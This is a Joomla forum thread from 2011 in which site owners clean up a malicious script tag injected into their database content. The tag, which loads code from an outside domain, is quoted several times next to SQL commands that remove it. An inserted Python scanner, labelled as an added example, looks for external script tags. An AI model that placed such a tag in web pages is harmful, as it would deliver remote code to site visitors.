The Joomla! Forum ™



Post subject: My Site Hacked
PostPosted: Tue May 17, 2011 7:58 pm
Joomla! Apprentice

Joined: Sat Dec 30, 2006 12:35 am
Posts: 42
Joomla 1.0.15 site

A script line of code has been added to every page of our site and I can't figure out how - I would have to guess some type of script was run on the mysql database? - the line added is <script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>

does anyone know how this could have happened, through database or other means and:

How can I remove it from all pages quickly?


PostPosted: Wed May 18, 2011 1:47 pm
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
I've no idea where this came from . . . same script.
Any ideas?
If I delete it manually from each article will it reappear?

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 4:26 pm
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I have this problem today too!

Can someone tell me where you find this malicious code please! Thanks!


Post subject: Joomla Version
PostPosted: Wed May 18, 2011 5:18 pm
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
A Google search for the offending script yielded this page; however, I had not noticed that in the original post you say you are using an old release of Joomla! The current version is 1.5.23.

Still though, I am using the current release. Yesterday I tried to set up Search Engine Friendly urls, but was having some trouble, in the process I renamed my htaccess.txt file, I think this may have allowed the script in. I have had trouble with a .htaccess file with this host once before, though not with a Joomla! installation.

I have since uploaded the original file from a backup and tried something simple. In phpMyAdmin I exported the database and opened it in a text editor. I then ran a find and replace for the offending code, and removed all instances - the easy way is to hit "replace all" with the "replace with" field blank. I then saved this and imported the updated .sql file into a new database. Problem solved it seems for me, for now.

I am no expert, so I do not know if I have found the root of the problem. If you do attempt any of this, do backups first, so you might retrace your steps should it all go wrong.

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 5:24 pm
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I've found the line of code added to each page in the jos_content and am removing it manually!


Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 6:23 pm
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I cleaned out the line of code with the problem from jos content/introtext in every page entry; however, I'm now looking for where to make the same change for the home page as it still has two instances of this code!!

Anyone know where I can find this?


Post subject: Re: My Site Hacked
PostPosted: Wed May 18, 2011 7:06 pm
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
OK solved it myself! - there were more lines in jos_content I missed the first time. Now it is cleaned out, but why and how are the next questions! How to prevent in future?


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 12:22 am
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
Question: are any of these sites perhaps hosted with IPOWER?

_________________
A clever person solves a problem. A wise person avoids it.


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:14 am
Joomla! Fledgling

Joined: Thu May 19, 2011 1:12 am
Posts: 1
I just found this on one of my client's sites...and they are hosted by iPower.


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:32 am
Joomla! Fledgling

Joined: Thu May 19, 2011 1:29 am
Posts: 2
Our Joomla site also has this problem and is also hosted by iPower. The site isn't even online at the moment, it is still being designed so I took it offline. I'm going to try removing the script manually and hope for the best. It really hangs the load time which is how I noticed it.


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:32 am
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
That is what I figured.
IPOWER servers have been hacked.
The code is being placed into records in the database.
For Wordpress sites read this forum post:
http://wordpress.org/support/topic/i-did-the-updrage-to-the-latest-version-now-i-have-some-strange-code
For Joomla! sites... well, I am working on coming up with a solution that doesn't involve having to edit every record.

_________________
A clever person solves a problem. A wise person avoids it.


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:47 am
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
Mine was IPOWER also!

I spoke to them and have an open case that is escalated with them.

The fix is to edit your Joomla database with phpMyAdmin, jos content/introtext field in every page entry, and remove the last line of code that starts with <script> and refers to the problem web site through the </script> and make sure you get them all and it is fixed!


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 1:59 am
Joomla! Fledgling

Joined: Thu May 19, 2011 1:29 am
Posts: 2
I removed all the script lines. Anyone have an idea on how we can prevent this from happening again?


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 2:20 am
Joomla! Enthusiast

Joined: Wed Jan 07, 2009 8:17 pm
Posts: 240
Location: New York City
I agree that the fix can be done through phpmyadmin. But here are the issues:
* I have a client site which has over 500 articles.
* Unless IPOWER is able to discover the cause of the breach, fixes (or patches) the issue, and notifies every user on their servers of the breach, and every user fixes their sites, then there is a very real chance that the script may be placed into the site db records again.

I saw this happen with MediaTemple a couple of years ago and it was a big mess. So far IPOWER has not issued anything or even put up a System Notice in their Support Help Center.

I posted a notification in the message board about the issue along with everything I know so far.
viewtopic.php?f=428&t=621812

_________________
A clever person solves a problem. A wise person avoids it.


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 3:47 am
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
I received a message from IPOWER about 1 hour ago that they 'removed the malicious code...' but no details.
Since I cleaned up myself I don't know what they did or are talking about so I asked them to explain and hopefully will get a reply to explain.
I suspect there was something else planted that did this, but let's pursue IPOWER for answers. I know I certainly will!


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 7:40 am
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
My site is also hosted on iPower, this is not the first time I have had a site hacked on their servers, last time it involved the .htaccess as far as I remember, so I presumed this had played a part again. Am I wrong in thinking that this file can alter the content on each page if hacked?

Will also raise it with iPower today.

Slán go fóill.

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Post subject: Re: My Site Hacked
PostPosted: Thu May 19, 2011 12:08 pm
Joomla! Apprentice

Joined: Sat Dec 30, 2006 12:35 am
Posts: 42
It appears that the script was only added to the introtext - I ran the following script in phpMyAdmin to remove it from the entire site. Sorry I didn't post the day it happened. My site has very strong passwords since my site was hacked a few years ago and the .htaccess file replaced - so I suspect it is on the ipower side that they gained access.

UPDATE jos_content SET introtext = replace(introtext,'<script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>','')

This page explains how to replace data in a mysql database - might be good to keep on hand for any future needs: http://www.mydigitallife.info/how-to-fi ... using-sql/


Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 12:51 am
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
To put the whipped cream and the cherry on the cake, IPOWER went into my database after I fixed the problem during the day and managed to corrupt my jos_content table.

Repeated support calls got very polite, but ineffective responses.

I finally got someone to tell me where the backup was and was able to extract the content, repair the malicious insert into introtext and reload and my site back up after 24 hours of frustration with total ineptitude of the provider iPOWER - shame on them.

I will leave them unless they explain how the database was harmed by tech support and how this whole episode started in the first place.

I have many other Joomla sites with other providers and this does not happen there!


Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 7:24 am
Joomla! Apprentice

Joined: Wed May 18, 2011 11:16 am
Posts: 11
Location: Ireland
Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

(Am I to believe they went ahead and gained access wherever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to me like not admitting they haven't a clue . . . )

_________________
http://henderson.ie http://celtictshirts.ie/index.php


Post subject: Re: My Site Hacked
PostPosted: Fri May 20, 2011 2:38 pm
Joomla! Apprentice

Joined: Fri Jul 24, 2009 12:23 pm
Posts: 17
Location: Parker CO
My experience was that they got into my database and managed to corrupt the jos_content table AFTER I had already cleaned out the junk and told them I was already OK.

I suspect that all the MySQL databases are managed as one or possibly groups and can be accessed from the top tier without our permission.

They offer no explanation nor information about what they are doing about this.

I'm preparing to leave them because I don't need this, as other providers offer better service and none of these problems.

Every issue I've brought to them has been solved by me because they are unresponsive and unprofessional.

All I can say is they are polite and 'Have a good day!'

3 strikes and they are out!


Post subject: Re: My Site Hacked
PostPosted: Mon Aug 08, 2011 10:34 am
Joomla! Fledgling

Joined: Thu Nov 19, 2009 12:11 pm
Posts: 3
Hi
I had the same issue and ipower. I used the command
update `jml_content` set `introtext`=TRIM(TRAILING '<script src="http://infoitpoweringgathering.com/ll.php?kk=11"></script>' FROM `introtext`);

to update them all at once and not miss anything.
does anyone think there is another field or table that was affected?
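
One way to check the question above about other affected fields or tables, as an added example that is not part of the original thread: it scans every text column for script tags loaded from an external host and removes them wherever they sit in the value, not only at the end. SQLite stands in for MySQL here; the jos_modules table, the body column, the host injected.example and all sample rows are constructed assumptions.

```python
import re
import sqlite3

# A <script> element whose src is an absolute http(s) URL; group 1 is the host.
EXT_SCRIPT = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?https?://([^/"\'\s>]+)[^>]*>\s*</script>',
    re.IGNORECASE)

def text_columns(conn):
    """Yield (table, column) for every text-typed column in the database."""
    tables = conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
    for (table,) in tables:
        for _, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")').fetchall():
            if "TEXT" in ctype.upper() or "CHAR" in ctype.upper():
                yield table, col

def scan(conn, allowed_hosts=()):
    """Return {(table, column): {host: rows_affected}} for hosts not allowed."""
    hits = {}
    for table, col in text_columns(conn):
        for (value,) in conn.execute(f'SELECT "{col}" FROM "{table}"').fetchall():
            hosts = {h.lower() for h in EXT_SCRIPT.findall(value or "")}
            for host in hosts - set(allowed_hosts):
                per_col = hits.setdefault((table, col), {})
                per_col[host] = per_col.get(host, 0) + 1
    return hits

def strip_host(conn, table, col, host):
    """Delete script tags loading from `host` in one column; return rows changed."""
    changed = 0
    for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"').fetchall():
        cleaned = EXT_SCRIPT.sub(
            lambda m: "" if m.group(1).lower() == host.lower() else m.group(0), value or "")
        if cleaned != (value or ""):
            conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned, rowid))
            changed += 1
    return changed

def demo_db():
    """Constructed sample rows; the schema only mimics the tables named in the thread."""
    bad = '<script src="http://injected.example/x.php?k=1"></script>'  # placeholder host
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jos_content (id INTEGER, introtext TEXT, body TEXT)")
    conn.execute("CREATE TABLE jos_modules (id INTEGER, content TEXT)")
    conn.executemany("INSERT INTO jos_content VALUES (?, ?, ?)", [
        (1, "<p>Hello</p>" + bad, ""),
        (2, bad + "<p>Mid</p>" + bad, "<p>More</p>"),
        (3, "<p>Clean</p>", '<script src="/media/local.js"></script>')])
    conn.execute("INSERT INTO jos_modules VALUES (1, ?)", ("<div>Home</div>" + bad,))
    return conn
```

Run `scan` again after cleaning; an empty result means no text column still references a host outside the allow list.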


Post subject: Re: My Site Hacked
PostPosted: Mon Jan 30, 2012 7:04 am
Joomla! Apprentice

Joined: Sat Jan 28, 2012 8:55 am
Posts: 7
seoirserob wrote:
Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

(Am I to believe they went ahead and gained access wherever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to me like not admitting they haven't a clue . . . )


Support rep asking for login credentials is just a false show to make you believe that even they don't have access to your server, which in fact is just a myth. Even I have a reseller's hosting account and do provide my customers with hosting accounts, and I don't need their login details to access their servers.

So the moral of the story is that besides keeping your scripts updated, it's necessary to choose a reliable host. If you have an important business website always opt for a dedicated hosting server. And last but not least, avoid buying cheap hosting from forums and other places. My 2 cents.

